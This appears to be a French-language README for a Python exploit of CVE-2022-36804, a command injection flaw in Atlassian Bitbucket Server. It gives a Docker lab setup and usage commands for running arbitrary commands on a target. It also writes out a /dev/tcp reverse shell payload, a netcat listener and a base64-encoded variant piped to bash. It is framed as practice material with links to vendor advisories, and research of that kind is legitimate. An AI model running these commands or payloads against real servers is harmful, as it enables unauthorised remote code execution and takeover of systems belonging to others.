
Exploit Python pour l'injection de commande CVE-2022-36804 dans Atlassian Bitbucket Server, permettant l'exécution de code à distance et un shell inversé avec des commandes personnalisables et un environnement de laboratoire Docker.
Une vulnérabilité critique d'injection de commandes a été découverte dans plusieurs points de terminaison API du serveur Bitbucket et du Data Center d'Atlassian. Cette vulnérabilité affecte toutes les versions de Bitbucket Server et Data Center publiées avant les versions <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2, et <8.3.1
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
Remplacez 172.17.0.3 par votre adresse IP locale
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"
nc -lvp 4444
https://www.revshells.comConvertissez `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` en base64 en cas d'erreur d'exécution du payload.
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"
Il est recommandé d'installer une version vulnérable du serveur Bitbucket sur une machine Windows/Linux pour s'exercer. Il sera plus facile d'obtenir un reverse shell qu'avec des images Docker.
Plus d'informations peuvent être trouvées [ici](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)
# Références
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804